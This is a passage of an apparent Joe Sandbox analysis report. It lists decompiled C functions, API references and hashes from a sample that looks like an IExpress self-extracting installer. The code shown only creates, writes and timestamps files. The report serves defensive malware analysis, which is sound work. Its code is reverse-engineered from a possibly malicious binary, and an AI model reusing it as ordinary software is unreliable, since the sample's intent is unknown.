                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e40
                                                                                                                                                                                                        0x00a94e51
                                                                                                                                                                                                        0x00a94e56
                                                                                                                                                                                                        0x00a94e5b
                                                                                                                                                                                                        0x00a94e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e6a
                                                                                                                                                                                                        0x00a94e6f
                                                                                                                                                                                                        0x00a94e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e77
                                                                                                                                                                                                        0x00a94e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e7d
                                                                                                                                                                                                        0x00a94d25
                                                                                                                                                                                                        0x00a94d25
                                                                                                                                                                                                        0x00a94d28
                                                                                                                                                                                                        0x00a94d36
                                                                                                                                                                                                        0x00a94d3b
                                                                                                                                                                                                        0x00a94d40
                                                                                                                                                                                                        0x00a94d40
                                                                                                                                                                                                        0x00a94d42
                                                                                                                                                                                                        0x00a94d43
                                                                                                                                                                                                        0x00a94d43
                                                                                                                                                                                                        0x00a94d47
                                                                                                                                                                                                        0x00a94d4a
                                                                                                                                                                                                        0x00a94d4a
                                                                                                                                                                                                        0x00a94d4c
                                                                                                                                                                                                        0x00a94d4f
                                                                                                                                                                                                        0x00a94d4f
                                                                                                                                                                                                        0x00a94d51
                                                                                                                                                                                                        0x00a94d52
                                                                                                                                                                                                        0x00a94d52
                                                                                                                                                                                                        0x00a94d56
                                                                                                                                                                                                        0x00a94d5b
                                                                                                                                                                                                        0x00a94d5d
                                                                                                                                                                                                        0x00a94d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d67
                                                                                                                                                                                                        0x00a94d6f
                                                                                                                                                                                                        0x00a94d74
                                                                                                                                                                                                        0x00a94d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d7c
                                                                                                                                                                                                        0x00a94d84
                                                                                                                                                                                                        0x00a94d89
                                                                                                                                                                                                        0x00a94d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d94
                                                                                                                                                                                                        0x00a94d99
                                                                                                                                                                                                        0x00a94d9e
                                                                                                                                                                                                        0x00a94da1
                                                                                                                                                                                                        0x00a94daa
                                                                                                                                                                                                        0x00a94daa
                                                                                                                                                                                                        0x00a94da3
                                                                                                                                                                                                        0x00a94da3
                                                                                                                                                                                                        0x00a94da3
                                                                                                                                                                                                        0x00a94db5
                                                                                                                                                                                                        0x00a94dbb
                                                                                                                                                                                                        0x00a94dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94dc3
                                                                                                                                                                                                        0x00a94dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94dc5
                                                                                                                                                                                                        0x00a94dbd
                                                                                                                                                                                                        0x00a94d2a
                                                                                                                                                                                                        0x00a94d2a
                                                                                                                                                                                                        0x00a94d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d2d
                                                                                                                                                                                                        0x00a94cf8
                                                                                                                                                                                                        0x00a94cfd
                                                                                                                                                                                                        0x00a94d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A94DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A94DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-2312194364
                                                                                                                                                                                                        • Opcode ID: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                        • Instruction ID: 7d5c163f15a9a508d275863a8d3aa242725cdfbc00f1e489e74d0f9e26e18bc4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B41003A3002059ACF259F68DA44EF677E5AF4D304F148669E886A7285DE31DE4BC790
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xa98d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xa98d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                        0x00a94c40
                                                                                                                                                                                                        0x00a94c4a
                                                                                                                                                                                                        0x00a94c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94c70
                                                                                                                                                                                                        0x00a94c70
                                                                                                                                                                                                        0x00a94c7e
                                                                                                                                                                                                        0x00a94c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 00A94C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A94C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A94C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                        • Instruction ID: 9ac5585b6bc64897e1954f4fdb973bebe1c85b6246c9216b11d857209d89f686
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0907271120CAF9F64DFB4CC49DBB77ECEB18240B44052BA815C1150EA30D915C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00A9487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00A9490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                        0x00a94880
                                                                                                                                                                                                        0x00a9488c
                                                                                                                                                                                                        0x00a94894
                                                                                                                                                                                                        0x00a948a0
                                                                                                                                                                                                        0x00a948c9
                                                                                                                                                                                                        0x00a948ce
                                                                                                                                                                                                        0x00a948a2
                                                                                                                                                                                                        0x00a948a8
                                                                                                                                                                                                        0x00a948b7
                                                                                                                                                                                                        0x00a948bc
                                                                                                                                                                                                        0x00a948aa
                                                                                                                                                                                                        0x00a948ac
                                                                                                                                                                                                        0x00a948ac
                                                                                                                                                                                                        0x00a948a8
                                                                                                                                                                                                        0x00a948de
                                                                                                                                                                                                        0x00a948e7
                                                                                                                                                                                                        0x00a9490b
                                                                                                                                                                                                        0x00a948ee
                                                                                                                                                                                                        0x00a948f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A94A23,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A948DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A94902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                        • Instruction ID: c6ae5ec2a510f206636691f70e17665d5bbcd499bffd3e68ab6cd4f8c984c977
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67014BA3F1257026F72481694C88FB7559CCB9A735F2B4336FDAAE71D1D5644C0681E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A94AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xa9858c; // 0x268
				_t9 = E00A93680(_t20);
				if( *0xa991d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xa98d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xa99400; // 0xbebfe
							_t15 = _t14 + _t25;
							 *0xa99400 = _t15;
							if( *0xa98184 != 0) {
								_t21 =  *0xa98584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa993f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                        0x00a94ad5
                                                                                                                                                                                                        0x00a94adb
                                                                                                                                                                                                        0x00a94ae7
                                                                                                                                                                                                        0x00a94aee
                                                                                                                                                                                                        0x00a94b05
                                                                                                                                                                                                        0x00a94b0d
                                                                                                                                                                                                        0x00a94b14
                                                                                                                                                                                                        0x00a94b1a
                                                                                                                                                                                                        0x00a94b1c
                                                                                                                                                                                                        0x00a94b21
                                                                                                                                                                                                        0x00a94b2a
                                                                                                                                                                                                        0x00a94b2f
                                                                                                                                                                                                        0x00a94b31
                                                                                                                                                                                                        0x00a94b39
                                                                                                                                                                                                        0x00a94b54
                                                                                                                                                                                                        0x00a94b54
                                                                                                                                                                                                        0x00a94b39
                                                                                                                                                                                                        0x00a94b2f
                                                                                                                                                                                                        0x00a94b0f
                                                                                                                                                                                                        0x00a94b0f
                                                                                                                                                                                                        0x00a94b0f
                                                                                                                                                                                                        0x00a94b5e
                                                                                                                                                                                                        0x00a94ae9
                                                                                                                                                                                                        0x00a94aed
                                                                                                                                                                                                        0x00a94aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A93680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                          • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                          • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A94B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
                                                                                                                                                                                                        • Instruction ID: 78e1f8e8d42108229a17b37f327fcca7a6a76e209e45bfdca1810a4c7d2c62f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4012931300215ABEB15CFA8DC45FA677A9AB49725F14822AE9399A1E0CF70D813CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A9658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xa98b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xa98b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00A916B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                        0x00a96592
                                                                                                                                                                                                        0x00a96594
                                                                                                                                                                                                        0x00a96596
                                                                                                                                                                                                        0x00a96598
                                                                                                                                                                                                        0x00a96598
                                                                                                                                                                                                        0x00a9659b
                                                                                                                                                                                                        0x00a9659b
                                                                                                                                                                                                        0x00a9659d
                                                                                                                                                                                                        0x00a9659e
                                                                                                                                                                                                        0x00a965a2
                                                                                                                                                                                                        0x00a965a4
                                                                                                                                                                                                        0x00a965a9
                                                                                                                                                                                                        0x00a965b2
                                                                                                                                                                                                        0x00a965b6
                                                                                                                                                                                                        0x00a965ba
                                                                                                                                                                                                        0x00a965c3
                                                                                                                                                                                                        0x00a965c5
                                                                                                                                                                                                        0x00a965c8
                                                                                                                                                                                                        0x00a965c8
                                                                                                                                                                                                        0x00a965c3
                                                                                                                                                                                                        0x00a965c9
                                                                                                                                                                                                        0x00a965cc
                                                                                                                                                                                                        0x00a965d2
                                                                                                                                                                                                        0x00a965d1
                                                                                                                                                                                                        0x00a965d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a965dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00A98B3E,00A98B3F,00000001,00A98B3E,-00000003,?,00A960EC,00A91140,?), ref: 00A965BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                        • Instruction ID: cd0a7ed1c148a366d4e80bacd6dfe7f830657b88b4be3ebf645845e57ed672be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21F04C327042509BDB324A1D9884B66BFDE9F86350F2A016FE8DEC3209CA658C46C3A4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A9621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xa98004; // 0x6298f871
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00A9597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00A944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xa99124 = E00A96285();
					_t9 = 0;
				}
				return E00A96CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                        0x00a96229
                                                                                                                                                                                                        0x00a96230
                                                                                                                                                                                                        0x00a96247
                                                                                                                                                                                                        0x00a9626a
                                                                                                                                                                                                        0x00a96272
                                                                                                                                                                                                        0x00a96249
                                                                                                                                                                                                        0x00a96255
                                                                                                                                                                                                        0x00a9625f
                                                                                                                                                                                                        0x00a96264
                                                                                                                                                                                                        0x00a96264
                                                                                                                                                                                                        0x00a96284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A9623F
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: e965ed071ee1cc2cd50997e2d5cb3fbeabc22a071579f6dff1702489c57be00c
                                                                                                                                                                                                        • Instruction ID: f1e592e0f60cdcd737c465d4f1dd8601b2a7d7480960690f837bbe13b8d06b0e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965ed071ee1cc2cd50997e2d5cb3fbeabc22a071579f6dff1702489c57be00c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDF0B4B0B002086BEF50EB748E02FFE32F8DB94300F40006AB986D6081ED749D458650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xa98d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xa98d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xa98d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xa98d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xa98d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                        0x00a94b66
                                                                                                                                                                                                        0x00a94b74
                                                                                                                                                                                                        0x00a94b98
                                                                                                                                                                                                        0x00a94ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94bac
                                                                                                                                                                                                        0x00a94ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94ba4
                                                                                                                                                                                                        0x00a94b78
                                                                                                                                                                                                        0x00a94b7e
                                                                                                                                                                                                        0x00a94b84
                                                                                                                                                                                                        0x00a94b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A94FA1,00000000), ref: 00A94B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                        • Instruction ID: 3ee9df78f49577059d7e9611a2cc66e57ed969317c33cc20ff95c75869793e47
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF01271700B089E5F71CF39CC01A52BBE4AAA6360310092F956ED2190DB35A44ACBD0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A966AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A966AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                        0x00a966b1
                                                                                                                                                                                                        0x00a966ba
                                                                                                                                                                                                        0x00a966c7
                                                                                                                                                                                                        0x00a966bc
                                                                                                                                                                                                        0x00a966be
                                                                                                                                                                                                        0x00a966be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00A94777,?,00A94E38,?), ref: 00A966B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
